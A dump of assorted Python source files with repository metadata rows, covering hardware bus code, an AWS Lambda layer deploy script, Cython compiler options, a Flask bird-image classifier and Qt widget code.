pwr[ii].next = True
else:
for ii in range(nregs):
pwr[ii].next = False
# get the generators that assign the named bits
gas = regfile.get_assigns()
return instances()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def get_generic(self):
generic = Barebone(Global(self.clock, self.reset),
data_width=self.data_width,
address_width=self.address_width)
return generic
def map_to_generic(self, generic):
clock = self.clock
wb, bb = self, generic
inprog = Signal(bool(0))
# the output signals need to be local and then the "interconnect"
# will combine all the outputs back to the master(s)
lwb_do = Signal(intbv(0)[self.data_width:])
lwb_ack = Signal(bool(0))
wb.add_output_bus(lwb_do, lwb_ack)
@always_comb
def rtl_assign():
bb.write.next = wb.cyc_i and wb.we_i
bb.read.next = wb.cyc_i and not wb.we_i
bb.write_data.next = wb.dat_i
lwb_do.next = bb.read_data
bb.per_addr.next = wb.adr_i[:16]
bb.mem_addr.next = wb.adr_i[16:]
@always(clock.posedge)
def rtl_ack():
if not lwb_ack and wb.cyc_i and not inprog:
lwb_ack.next = True
inprog.next = True
elif lwb_ack and wb.cyc_i:
lwb_ack.next = False
elif not wb.cyc_i:
inprog.next = False
return rtl_assign, rtl_ack
def map_from_generic(self, generic):
clock = self.clock
wb, bb = self, generic
inprog = Signal(bool(0))
iswrite = Signal(bool(0))
@always_comb
def rtl_assign():
if bb.write or bb.read:
wb.cyc_i.next = True
wb.we_i.next = True if bb.write else False
elif inprog:
wb.cyc_i.next = True
wb.we_i.next = True if iswrite else False
else:
wb.cyc_i.next = False
wb.we_i.next = False
wb.adr_i.next = concat(bb.per_addr, bb.reg_addr)
wb.dat_i.next = bb.write_data
bb.read_data.next = wb.dat_o
@always(clock.posedge)
def rtl_delay():
if not inprog and (bb.read or bb.write):
inprog.next = True
iswrite.next = bb.write
if inprog and wb.ack_o:
inprog.next = False
iswrite.next = False
@always_comb
def rtl_done():
bb.done.next = not inprog
return rtl_assign
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def writetrans(self, addr, val):
""" write accessor for testbenches
Not convertible.
"""
self._start_transaction(write=True, address=addr, data=val)
# toggle the signals for the bus transaction
yield self.clk_i.posedge
self.adr_i.next = addr
self.dat_i.next = self._write_data
self.we_i.next = True
self.cyc_i.next = True
self.stb_i.next = True
to = 0
# wait for ack
while not self.ack_o and to < self.timeout:
yield self.clk_i.posedge
to += 1
self.we_i.next = False
self.cyc_i.next = False
self.stb_i.next = False
yield self.clk_i.posedge
self._end_transaction()
def readtrans(self, addr):
""" read accessor for testbenches
"""
self._start_transaction(write=False, address=addr)
yield self.clk_i.posedge
self.adr_i.next = addr
self.cyc_i.next = True
self.stb_i.next = True
to = 0
while not self.ack_o and to < self.timeout:
yield self.clk_i.posedge
to += 1
self.cyc_i.next = False
self.stb_i.next = False
self._end_transaction(self.dat_o)
def acktrans(self, data=None):
""" acknowledge accessor for testbenches
:param data:
:return:
"""
self.ack_o.next = True
if data is not None:
self.dat_o.next = data
yield self.clk_i.posedge
self.ack_o.next = False
| [
"chris.felton@gmail.com"
] | chris.felton@gmail.com |
5df4cb7698d616222b871122a1bd80d5a80a62ff | d5e279c64f7615cd14d82c59aca2ee17eef1c8f1 | /scripts/deploy-layer.py | 6830a56542322f06b17f3d9bd32892a6ce3a7194 | [] | no_license | kylebarron/cogeo-layer | d075ca12b95edf4731d89c2d68a548ec68c8a881 | f04d14ebf99dfcfa71ae5584a818956e91e8f0fa | refs/heads/master | 2021-04-18T14:25:31.567363 | 2020-03-24T03:08:34 | 2020-03-24T03:08:34 | 249,553,335 | 5 | 0 | null | 2020-03-23T23:25:28 | 2020-03-23T21:58:23 | null | UTF-8 | Python | false | false | 2,576 | py |
import click
import hashlib
from boto3.session import Session as boto3_session
AWS_REGIONS = [
"eu-central-1",
"us-east-1",
"us-east-2",
"us-west-1",
"us-west-2",
]
def _md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
@click.command()
@click.argument('gdalversion', type=str)
@click.argument('pythonversion', type=str)
@click.argument('layername', type=str)
def main(gdalversion, pythonversion, layername):
local_name = f"gdal{gdalversion}-py{pythonversion}-{layername}.zip"
next_layer_sha = _md5(local_name)
runtime = f"python{pythonversion}"
gdalversion_nodot = gdalversion.replace(".", "")
pythonversion_nodot = pythonversion.replace(".", "")
layer_name = f"gdal{gdalversion_nodot}-py{pythonversion_nodot}-{layername}"
description = f"Lambda Layer with GDAL{gdalversion} - {runtime} - {next_layer_sha}"
session = boto3_session()
click.echo(f"Deploying {layer_name}", err=True)
for region in AWS_REGIONS:
click.echo(f"AWS Region: {region}", err=True)
client = session.client("lambda", region_name=region)
res = client.list_layer_versions(
CompatibleRuntime=runtime, LayerName=layer_name
)
layers = res.get("LayerVersions")
click.echo(f"Found {len(layers)} versions.", err=True)
if layers:
layer = layers[0]
layer_sha = layer["Description"].split(" ")[-1]
else:
layer_sha = ""
click.echo(f"Current SHA: {layer_sha}", err=True)
click.echo(f"New SHA: {next_layer_sha}", err=True)
if layer_sha == next_layer_sha:
click.echo("No update needed", err=True)
continue
click.echo(f"Publishing new version", err=True)
with open(local_name, 'rb') as zf:
res = client.publish_layer_version(
LayerName=layer_name,
Content={"ZipFile": zf.read()},
CompatibleRuntimes=[runtime],
Description=description,
LicenseInfo="MIT"
)
version = res["Version"]
click.echo(f"Adding permission", err=True)
client.add_layer_version_permission(
LayerName=layer_name,
VersionNumber=version,
StatementId='make_public',
Action='lambda:GetLayerVersion',
Principal='*',
)
if __name__ == '__main__':
main()
| [
"vincent.sarago@gmail.com"
] | vincent.sarago@gmail.com |
f9cfddcd3da8437fd43cbe1a9e37a49a32c199a0 | 0b406d2c041c76d9ef8789539e0e3af9a50e3613 | /Extract_refactor/WebScrapy/manager.py | 37fd76cb4a79a41b493987d4e7ca799edc0f8929 | [] | no_license | aise17/ExtractPdf | 221b47c5f0e75a823284b4f52981917962042592 | 7e1bfbc759cb7473d727574e5df78eaaac9fa8a4 | refs/heads/master | 2022-02-26T06:39:14.265795 | 2019-06-04T15:01:39 | 2019-06-04T15:01:39 | 184,154,301 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | from Extract_refactor.settings import IMAGENES_PATH
from .web_info import WebInfo
import unicodecsv as csv
class Manager(WebInfo):
def __init__(self, ruta_entrada):
#self.resultados = {'status': 200, 'alexa': u'\n\n4,484,464 ', 'language': u'es-es', 'url': 'http://todosaintseiya.com', 'platform': ['prestashop'], 'mail': u'.todosaintseiya@hotmail.com.TODOSAINTSEIYA@HOTMAIL.COM'}
self.urls_list = []
self.writer = ''
self.ruta_entrada = ruta_entrada
def open_book_writer(self):
f = open('salida/' + self.ruta_entrada, 'wb')
self.writer = csv.writer(f, lineterminator='\n', encoding='utf-8')
self.writer.writerow(('url','alexa', 'status', 'platform', 'language', 'mail'))
def open_book_append(self):
f = open('salida/' + self.ruta_entrada, 'ab')
self.writer = csv.writer(f, lineterminator='\n', encoding='utf-8')
def export(self):
self.writer.writerow((self.resultados['url'], self.resultados['alexa'], self.resultados['status'], self.resultados['platform'], self.resultados['language'], self.resultados['mail']))
def imports(self):
with open('media/' + self.ruta_entrada, 'rb') as f:
reader = csv.reader(f, encoding='utf-8')
for row in reader:
self.urls_list.append(row)
print (self.urls_list)
#manager = Manager()
#manager.imports()
| [
"sergio.martinez-g@hotmail.com"
] | sergio.martinez-g@hotmail.com |
7d1a8e1308c251ab8962fd8e55d64f1b6591f4cd | 0c0168a4676bce7453836a7509e7133044aa8975 | /byceps/services/shop/order/models/action.py | a522c5bf75985a56a31b5bdbfde5a96a124daac9 | [
"BSD-3-Clause"
] | permissive | byceps/byceps | 0aad3c4d974f76c6f8c3674d5539a80c9107b97a | eaee2b7fdc08c76c16ddf7f436110e0b5f1812e5 | refs/heads/main | 2023-09-01T04:03:13.365687 | 2023-09-01T03:28:18 | 2023-09-01T03:28:18 | 40,150,239 | 44 | 23 | BSD-3-Clause | 2023-05-16T18:41:32 | 2015-08-03T22:05:23 | Python | UTF-8 | Python | false | false | 565 | py | """
byceps.services.shop.order.models.action
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2014-2023 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from dataclasses import dataclass
from typing import Any
from uuid import UUID
from byceps.services.shop.article.models import ArticleID
from .order import PaymentState
ActionParameters = dict[str, Any]
@dataclass(frozen=True)
class Action:
id: UUID
article_id: ArticleID
payment_state: PaymentState
procedure_name: str
parameters: ActionParameters
| [
"homework@nwsnet.de"
] | homework@nwsnet.de |
2e0c98154ff9965f3b78d4ec24114cbfb88b9b4a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/63/usersdata/209/32491/submittedfiles/swamee.py | 4e0b7ced6a958750f520d5f31ba92b776a1694b6 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # -*- coding: utf-8 -*-
import math
#COMECE SEU CÓDIGO AQUI
f=float(input('digite o valor f:'))
L=float(input('Digite o valor L:'))
Q=float(input('Digite o valor Q:'))
DELTAH=float(input('Digite o valor DELTAH:'))
V=float(input('digite o valor V:'))
g=9.81
e=0.000002
D=((8*f*L*(Q**2))/((math.pi**2)*g*DELTAH))**(1/5)
Rey=4*Q/math.pi*D*V
k=(0.25/(math.log10((e/3.7*D)+(5.74/Rey**0.9)))**2
print('O valor D é %.4f'%D)
print('O valor Rey é %.4f'%Rey)
print('O valor k é %f'%k) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
f111a9ff3e1407a7ee0c4f7393192a0f7880fc4e | 634fb5fe10e8f944da44ab31896acc8471ec5f18 | /hq_env/lib/python2.7/site-packages/Cython/Compiler/Options.py | 764c8868c7411e3a9fde58f88e3235ecd4146f9c | [] | no_license | dimagi/commcarehq-venv | 277d0b6fada24f2edd54f74850267201153412a7 | 2c52e3fb0f974cae5c5feaea1d5de851fe530c80 | refs/heads/master | 2021-01-18T14:05:47.931306 | 2015-07-20T10:10:41 | 2015-07-20T10:10:41 | 11,513,855 | 1 | 1 | null | 2015-07-20T10:10:41 | 2013-07-18T21:09:22 | Python | UTF-8 | Python | false | false | 8,499 | py | #
# Cython - Compilation-wide options and pragma declarations
#
# Perform lookups on builtin names only once, at module initialisation
# time. This will prevent the module from getting imported if a
# builtin name that it uses cannot be found during initialisation.
cache_builtins = True
embed_pos_in_docstring = False
gcc_branch_hints = True
pre_import = None
docstrings = True
# Decref global variables in this module on exit for garbage collection.
# 0: None, 1+: interned objects, 2+: cdef globals, 3+: types objects
# Mostly for reducing noise for Valgrind, only executes at process exit
# (when all memory will be reclaimed anyways).
generate_cleanup_code = False
annotate = False
# This will abort the compilation on the first error occured rather than trying
# to keep going and printing further error messages.
fast_fail = False
# Make all warnings into errors.
warning_errors = False
# Make unknown names an error. Python raises a NameError when
# encountering unknown names at runtime, whereas this option makes
# them a compile time error. If you want full Python compatibility,
# you should disable this option and also 'cache_builtins'.
error_on_unknown_names = True
# This will convert statements of the form "for i in range(...)"
# to "for i from ..." when i is a cdef'd integer type, and the direction
# (i.e. sign of step) can be determined.
# WARNING: This may change the semantics if the range causes assignment to
# i to overflow. Specifically, if this option is set, an error will be
# raised before the loop is entered, wheras without this option the loop
# will execute until an overflowing value is encountered.
convert_range = True
# Enable this to allow one to write your_module.foo = ... to overwrite the
# definition if the cpdef function foo, at the cost of an extra dictionary
# lookup on every call.
# If this is 0 it simply creates a wrapper.
lookup_module_cpdef = False
# Whether or not to embed the Python interpreter, for use in making a
# standalone executable or calling from external libraries.
# This will provide a method which initalizes the interpreter and
# executes the body of this module.
embed = None
# Disables function redefinition, allowing all functions to be declared at
# module creation time. For legacy code only, needed for some circular imports.
disable_function_redefinition = False
# In previous iterations of Cython, globals() gave the first non-Cython module
# globals in the call stack. Sage relies on this behavior for variable injection.
old_style_globals = False
# Allows cimporting from a pyx file without a pxd file.
cimport_from_pyx = False
# max # of dims for buffers -- set lower than number of dimensions in numpy, as
# slices are passed by value and involve a lot of copying
buffer_max_dims = 8
# Declare compiler directives
directive_defaults = {
'boundscheck' : True,
'nonecheck' : False,
'initializedcheck' : True,
'embedsignature' : False,
'locals' : {},
'auto_cpdef': False,
'cdivision': False, # was True before 0.12
'cdivision_warnings': False,
'always_allow_keywords': False,
'allow_none_for_extension_args': True,
'wraparound' : True,
'ccomplex' : False, # use C99/C++ for complex types and arith
'callspec' : "",
'final' : False,
'internal' : False,
'profile': False,
'infer_types': None,
'infer_types.verbose': False,
'autotestdict': True,
'autotestdict.cdef': False,
'autotestdict.all': False,
'language_level': 2,
'fast_getattr': False, # Undocumented until we come up with a better way to handle this everywhere.
'py2_import': False, # For backward compatibility of Cython's source code in Py3 source mode
# set __file__ and/or __path__ to known source/target path at import time (instead of not having them available)
'set_initial_path' : None, # SOURCEFILE or "/full/path/to/module"
'warn': None,
'warn.undeclared': False,
'warn.unreachable': True,
'warn.maybe_uninitialized': False,
'warn.unused': False,
'warn.unused_arg': False,
'warn.unused_result': False,
# optimizations
'optimize.inline_defnode_calls': False,
# remove unreachable code
'remove_unreachable': True,
# control flow debug directives
'control_flow.dot_output': "", # Graphviz output filename
'control_flow.dot_annotate_defs': False, # Annotate definitions
# test support
'test_assert_path_exists' : [],
'test_fail_if_path_exists' : [],
# experimental, subject to change
'binding': None,
'experimental_cpp_class_def': False
}
# Extra warning directives
extra_warnings = {
'warn.maybe_uninitialized': True,
'warn.unreachable': True,
'warn.unused': True,
}
# Override types possibilities above, if needed
directive_types = {
'final' : bool, # final cdef classes and methods
'internal' : bool, # cdef class visibility in the module dict
'infer_types' : bool, # values can be True/None/False
'binding' : bool,
'cfunc' : None, # decorators do not take directive value
'ccall' : None,
'cclass' : None,
'returns' : type,
'set_initial_path': str,
}
for key, val in directive_defaults.items():
if key not in directive_types:
directive_types[key] = type(val)
directive_scopes = { # defaults to available everywhere
# 'module', 'function', 'class', 'with statement'
'final' : ('cclass', 'function'),
'internal' : ('cclass',),
'autotestdict' : ('module',),
'autotestdict.all' : ('module',),
'autotestdict.cdef' : ('module',),
'set_initial_path' : ('module',),
'test_assert_path_exists' : ('function', 'class', 'cclass'),
'test_fail_if_path_exists' : ('function', 'class', 'cclass'),
}
def parse_directive_value(name, value, relaxed_bool=False):
"""
Parses value as an option value for the given name and returns
the interpreted value. None is returned if the option does not exist.
>>> print parse_directive_value('nonexisting', 'asdf asdfd')
None
>>> parse_directive_value('boundscheck', 'True')
True
>>> parse_directive_value('boundscheck', 'true')
Traceback (most recent call last):
...
ValueError: boundscheck directive must be set to True or False, got 'true'
"""
type = directive_types.get(name)
if not type: return None
orig_value = value
if type is bool:
value = str(value)
if value == 'True': return True
if value == 'False': return False
if relaxed_bool:
value = value.lower()
if value in ("true", "yes"): return True
elif value in ("false", "no"): return False
raise ValueError("%s directive must be set to True or False, got '%s'" % (
name, orig_value))
elif type is int:
try:
return int(value)
except ValueError:
raise ValueError("%s directive must be set to an integer, got '%s'" % (
name, orig_value))
elif type is str:
return str(value)
else:
assert False
def parse_directive_list(s, relaxed_bool=False, ignore_unknown=False,
current_settings=None):
"""
Parses a comma-separated list of pragma options. Whitespace
is not considered.
>>> parse_directive_list(' ')
{}
>>> (parse_directive_list('boundscheck=True') ==
... {'boundscheck': True})
True
>>> parse_directive_list(' asdf')
Traceback (most recent call last):
...
ValueError: Expected "=" in option "asdf"
>>> parse_directive_list('boundscheck=hey')
Traceback (most recent call last):
...
ValueError: boundscheck directive must be set to True or False, got 'hey'
>>> parse_directive_list('unknown=True')
Traceback (most recent call last):
...
ValueError: Unknown option: "unknown"
"""
if current_settings is None:
result = {}
else:
result = current_settings
for item in s.split(','):
item = item.strip()
if not item: continue
if not '=' in item: raise ValueError('Expected "=" in option "%s"' % item)
name, value = [ s.strip() for s in item.strip().split('=', 1) ]
parsed_value = parse_directive_value(name, value, relaxed_bool=relaxed_bool)
if parsed_value is None:
if not ignore_unknown:
raise ValueError('Unknown option: "%s"' % name)
else:
result[name] = parsed_value
return result
| [
"dmyung@dimagi.com"
] | dmyung@dimagi.com |
5bbf71483d224e876d127a59536281a42b89502e | e28547b5bbdc00c2ebeba2f7f438570f2e050925 | /app.py | a1b73e96a96c87a6bdcf8c5ab10d0dff258c2a8d | [] | no_license | bridgecrew-perf7/bird-classification-deploy | e0ce0dc6eec0b5fe15c03fbfee9969676d2fbb96 | e7dae0ae9dfea8b30db2e83c4859dee290b5a719 | refs/heads/main | 2023-08-07T13:24:04.693214 | 2021-09-21T13:32:15 | 2021-09-21T13:32:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,782 | py | from __future__ import division, print_function
import torch
import torchvision.transforms as tt
from PIL import Image
import torch.nn as nn
from flask import Flask, redirect, url_for, request, render_template
from torchvision.transforms import transforms
from werkzeug.utils import secure_filename
# coding=utf-8
import sys
import os
import glob
import re
import numpy as np
def conv_block(in_channels, out_channels, pool=False):
layers = [nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True)]
if pool: layers.append(nn.MaxPool2d(2))
return nn.Sequential(*layers)
class ResNet9(nn.Module):
def __init__(self, in_channels, num_classes):
super().__init__()
# Input: 64 x 3 x 64 x 64
self.conv1 = conv_block(in_channels, 64) # 64 x 64 x 64 x 64
self.conv2 = conv_block(64, 128, pool=True) # 64 x 128 x 32 x 32
self.res1 = nn.Sequential(conv_block(128, 128), # 64 x 128 x 32 x 32
conv_block(128, 128)) # 64 x 128 x 32 x 32
self.conv3 = conv_block(128, 256, pool=True) # 64 x 256 x 16 x 16
self.conv4 = conv_block(256, 512, pool=True) # 64 x 512 x 8 x 8
self.res2 = nn.Sequential(conv_block(512, 512), # 64 x 512 x 8 x 8
conv_block(512, 512)) # 64 x 512 x 8 x 8
self.classifier = nn.Sequential(nn.AdaptiveMaxPool2d(1), # 64 x 512 x 1 x 1
nn.Flatten(), # 64 x 512
nn.Dropout(0.2),
nn.Linear(512, num_classes))
def forward(self, xb):
out = self.conv1(xb)
out = self.conv2(out)
out = self.res1(out) + out
out = self.conv3(out)
out = self.conv4(out)
out = self.res2(out) + out
out = self.classifier(out)
return out
from gevent.pywsgi import WSGIServer
app = Flask(__name__)
model = ResNet9(3,275)
model = torch.load('cnn.pt',map_location='cpu')
print('Model loaded')
tts = tt.Compose([tt.Resize(64),tt.RandomCrop(64),tt.ToTensor()])
l = ['AFRICAN CROWNED CRANE',
'AFRICAN FIREFINCH',
'ALBATROSS',
'ALEXANDRINE PARAKEET',
'AMERICAN AVOCET',
'AMERICAN BITTERN',
'AMERICAN COOT',
'AMERICAN GOLDFINCH',
'AMERICAN KESTREL',
'AMERICAN PIPIT',
'AMERICAN REDSTART',
'ANHINGA',
'ANNAS HUMMINGBIRD',
'ANTBIRD',
'ARARIPE MANAKIN',
'ASIAN CRESTED IBIS',
'BALD EAGLE',
'BALI STARLING',
'BALTIMORE ORIOLE',
'BANANAQUIT',
'BANDED BROADBILL',
'BAR-TAILED GODWIT',
'BARN OWL',
'BARN SWALLOW',
'BARRED PUFFBIRD',
'BAY-BREASTED WARBLER',
'BEARDED BARBET',
'BEARDED REEDLING',
'BELTED KINGFISHER',
'BIRD OF PARADISE',
'BLACK & YELLOW bROADBILL',
'BLACK FRANCOLIN',
'BLACK SKIMMER',
'BLACK SWAN',
'BLACK TAIL CRAKE',
'BLACK THROATED BUSHTIT',
'BLACK THROATED WARBLER',
'BLACK VULTURE',
'BLACK-CAPPED CHICKADEE',
'BLACK-NECKED GREBE',
'BLACK-THROATED SPARROW',
'BLACKBURNIAM WARBLER',
'BLUE GROUSE',
'BLUE HERON',
'BOBOLINK',
'BORNEAN BRISTLEHEAD',
'BORNEAN LEAFBIRD',
'BROWN NOODY',
'BROWN THRASHER',
'BULWERS PHEASANT',
'CACTUS WREN',
'CALIFORNIA CONDOR',
'CALIFORNIA GULL',
'CALIFORNIA QUAIL',
'CANARY',
'CAPE MAY WARBLER',
'CAPUCHINBIRD',
'CARMINE BEE-EATER',
'CASPIAN TERN',
'CASSOWARY',
'CEDAR WAXWING',
'CHARA DE COLLAR',
'CHIPPING SPARROW',
'CHUKAR PARTRIDGE',
'CINNAMON TEAL',
'CLARKS NUTCRACKER',
'COCK OF THE ROCK',
'COCKATOO',
'COMMON FIRECREST',
'COMMON GRACKLE',
'COMMON HOUSE MARTIN',
'COMMON LOON',
'COMMON POORWILL',
'COMMON STARLING',
'COUCHS KINGBIRD',
'CRESTED AUKLET',
'CRESTED CARACARA',
'CRESTED NUTHATCH',
'CROW',
'CROWNED PIGEON',
'CUBAN TODY',
'CURL CRESTED ARACURI',
'D-ARNAUDS BARBET',
'DARK EYED JUNCO',
'DOUBLE BARRED FINCH',
'DOWNY WOODPECKER',
'EASTERN BLUEBIRD',
'EASTERN MEADOWLARK',
'EASTERN ROSELLA',
'EASTERN TOWEE',
'ELEGANT TROGON',
'ELLIOTS PHEASANT',
'EMPEROR PENGUIN',
'EMU',
'ENGGANO MYNA',
'EURASIAN GOLDEN ORIOLE',
'EURASIAN MAGPIE',
'EVENING GROSBEAK',
'FIRE TAILLED MYZORNIS',
'FLAME TANAGER',
'FLAMINGO',
'FRIGATE',
'GAMBELS QUAIL',
'GANG GANG COCKATOO',
'GILA WOODPECKER',
'GILDED FLICKER',
'GLOSSY IBIS',
'GO AWAY BIRD',
'GOLD WING WARBLER',
'GOLDEN CHEEKED WARBLER',
'GOLDEN CHLOROPHONIA',
'GOLDEN EAGLE',
'GOLDEN PHEASANT',
'GOLDEN PIPIT',
'GOULDIAN FINCH',
'GRAY CATBIRD',
'GRAY PARTRIDGE',
'GREAT POTOO',
'GREATOR SAGE GROUSE',
'GREEN JAY',
'GREEN MAGPIE',
'GREY PLOVER',
'GUINEA TURACO',
'GUINEAFOWL',
'GYRFALCON',
'HARPY EAGLE',
'HAWAIIAN GOOSE',
'HELMET VANGA',
'HIMALAYAN MONAL',
'HOATZIN',
'HOODED MERGANSER',
'HOOPOES',
'HORNBILL',
'HORNED GUAN',
'HORNED SUNGEM',
'HOUSE FINCH',
'HOUSE SPARROW',
'IMPERIAL SHAQ',
'INCA TERN',
'INDIAN BUSTARD',
'INDIAN PITTA',
'INDIGO BUNTING',
'JABIRU',
'JAVA SPARROW',
'KAKAPO',
'KILLDEAR',
'KING VULTURE',
'KIWI',
'KOOKABURRA',
'LARK BUNTING',
'LEARS MACAW',
'LILAC ROLLER',
'LONG-EARED OWL',
'MAGPIE GOOSE',
'MALABAR HORNBILL',
'MALACHITE KINGFISHER',
'MALEO',
'MALLARD DUCK',
'MANDRIN DUCK',
'MARABOU STORK',
'MASKED BOOBY',
'MASKED LAPWING',
'MIKADO PHEASANT',
'MOURNING DOVE',
'MYNA',
'NICOBAR PIGEON',
'NOISY FRIARBIRD',
'NORTHERN BALD IBIS',
'NORTHERN CARDINAL',
'NORTHERN FLICKER',
'NORTHERN GANNET',
'NORTHERN GOSHAWK',
'NORTHERN JACANA',
'NORTHERN MOCKINGBIRD',
'NORTHERN PARULA',
'NORTHERN RED BISHOP',
'NORTHERN SHOVELER',
'OCELLATED TURKEY',
'OKINAWA RAIL',
'OSPREY',
'OSTRICH',
'OVENBIRD',
'OYSTER CATCHER',
'PAINTED BUNTIG',
'PALILA',
'PARADISE TANAGER',
'PARAKETT AKULET',
'PARUS MAJOR',
'PEACOCK',
'PELICAN',
'PEREGRINE FALCON',
'PHILIPPINE EAGLE',
'PINK ROBIN',
'PUFFIN',
'PURPLE FINCH',
'PURPLE GALLINULE',
'PURPLE MARTIN',
'PURPLE SWAMPHEN',
'PYGMY KINGFISHER',
'QUETZAL',
'RAINBOW LORIKEET',
'RAZORBILL',
'RED BEARDED BEE EATER',
'RED BELLIED PITTA',
'RED BROWED FINCH',
'RED FACED CORMORANT',
'RED FACED WARBLER',
'RED HEADED DUCK',
'RED HEADED WOODPECKER',
'RED HONEY CREEPER',
'RED TAILED THRUSH',
'RED WINGED BLACKBIRD',
'RED WISKERED BULBUL',
'REGENT BOWERBIRD',
'RING-NECKED PHEASANT',
'ROADRUNNER',
'ROBIN',
'ROCK DOVE',
'ROSY FACED LOVEBIRD',
'ROUGH LEG BUZZARD',
'ROYAL FLYCATCHER',
'RUBY THROATED HUMMINGBIRD',
'RUFOUS KINGFISHER',
'RUFUOS MOTMOT',
'SAMATRAN THRUSH',
'SAND MARTIN',
'SCARLET IBIS',
'SCARLET MACAW',
'SHOEBILL',
'SHORT BILLED DOWITCHER',
'SMITHS LONGSPUR',
'SNOWY EGRET',
'SNOWY OWL',
'SORA',
'SPANGLED COTINGA',
'SPLENDID WREN',
'SPOON BILED SANDPIPER',
'SPOONBILL',
'SRI LANKA BLUE MAGPIE',
'STEAMER DUCK',
'STORK BILLED KINGFISHER',
'STRAWBERRY FINCH',
'STRIPPED SWALLOW',
'SUPERB STARLING',
'SWINHOES PHEASANT',
'TAIWAN MAGPIE',
'TAKAHE',
'TASMANIAN HEN',
'TEAL DUCK',
'TIT MOUSE',
'TOUCHAN',
'TOWNSENDS WARBLER',
'TREE SWALLOW',
'TRUMPTER SWAN',
'TURKEY VULTURE',
'TURQUOISE MOTMOT',
'UMBRELLA BIRD',
'VARIED THRUSH',
'VENEZUELIAN TROUPIAL',
'VERMILION FLYCATHER',
'VICTORIA CROWNED PIGEON',
'VIOLET GREEN SWALLOW',
'VULTURINE GUINEAFOWL',
'WATTLED CURASSOW',
'WHIMBREL',
'WHITE CHEEKED TURACO',
'WHITE NECKED RAVEN',
'WHITE TAILED TROPIC',
'WHITE THROATED BEE EATER',
'WILD TURKEY',
'WILSONS BIRD OF PARADISE',
'WOOD DUCK',
'YELLOW BELLIED FLOWERPECKER',
'YELLOW CACIQUE',
'YELLOW HEADED BLACKBIRD']
def model_predict(img_path,model,tts,l):
img = Image.open(img_path)
trans_img = tts(img)
trans_img = trans_img.unsqueeze(0)
s = model(trans_img)
_, preds = torch.max(s, dim=1)
return l[preds[0].item()]
print('predict model ran')
@app.route('/', methods=['GET'])
def index():
# Main page
return render_template('index.html')
@app.route('/predict', methods=['GET', 'POST'])
def upload():
if request.method == 'POST':
# Get the file from post request
f = request.files['file']
# Save the file to ./uploads
basepath = os.path.dirname(__file__)
file_path = os.path.join(
basepath, 'uploads', secure_filename(f.filename))
f.save(file_path)
# Make prediction
preds = model_predict(file_path, model,tts,l)
result=preds
return result
return None
print('Everything ran')
if __name__ == '__main__':
app.run(debug=True)
| [
"noreply@github.com"
] | bridgecrew-perf7.noreply@github.com |
30017f7b526335a428e035841353278b9d337ae7 | 997180420fabdd6f730f4673dba1f979bd91e699 | /apps/goods/t1.py | 70106faaf0574a7c9f66d963b3cb6942a4f54227 | [] | no_license | bwisgood/drf20F_api_pro | 66bb17479594247a2e74e4eef7434cdaf8b54de9 | ff4579ce8eaca7071ea27b5d071a58dbf63c2385 | refs/heads/master | 2020-03-27T02:52:28.973201 | 2018-09-20T05:01:40 | 2018-09-20T05:01:40 | 145,823,482 | 1 | 0 | null | 2018-08-23T14:00:24 | 2018-08-23T08:20:25 | JavaScript | UTF-8 | Python | false | false | 243 | py | class A:
a = 1
def __init__(self):
b = 2
def __repr__(self):
return "123"
def __str__(self):
return "456"
if __name__ == '__main__':
a = A()
print(repr(a))
print(a.__repr__())
print(a) | [
"857464370@qq.com"
] | 857464370@qq.com |
588728ae141a1688b6adb628431a81037164d133 | 7b437e095068fb3f615203e24b3af5c212162c0d | /enaml/qt/qt_time_selector.py | 44ed2090c63a693722eb360745f4e4e37af26edb | [
"BSD-3-Clause"
] | permissive | ContinuumIO/enaml | d8200f97946e5139323d22fba32c05231c2b342a | 15c20b035a73187e8e66fa20a43c3a4372d008bd | refs/heads/master | 2023-06-26T16:16:56.291781 | 2013-03-26T21:13:52 | 2013-03-26T21:13:52 | 9,047,832 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,978 | py | #------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from PyQt4.QtGui import QTimeEdit
from atom.api import Typed
from enaml.widgets.time_selector import ProxyTimeSelector
from .qt_bounded_time import QtBoundedTime, CHANGED_GUARD
class QtTimeSelector(QtBoundedTime, ProxyTimeSelector):
""" A Qt implementation of an Enaml ProxyTimeSelector.
"""
#: A reference to the widget created by the proxy.
widget = Typed(QTimeEdit)
#--------------------------------------------------------------------------
# Initialization API
#--------------------------------------------------------------------------
def create_widget(self):
""" Create the QTimeEdit widget.
"""
self.widget = QTimeEdit(self.parent_widget())
def init_widget(self):
""" Initialize the widget.
"""
super(QtTimeSelector, self).init_widget()
d = self.declaration
self.set_time_format(d.time_format)
self.widget.timeChanged.connect(self.on_time_changed)
#--------------------------------------------------------------------------
# Abstract API Implementation
#--------------------------------------------------------------------------
def get_time(self):
""" Return the current time in the control.
Returns
-------
result : time
The current control time as a time object.
"""
return self.widget.time().toPyTime()
def set_minimum(self, time):
""" Set the widget's minimum time.
Parameters
----------
time : time
The time object to use for setting the minimum time.
"""
self.widget.setMinimumTime(time)
def set_maximum(self, time):
""" Set the widget's maximum time.
Parameters
----------
time : time
The time object to use for setting the maximum time.
"""
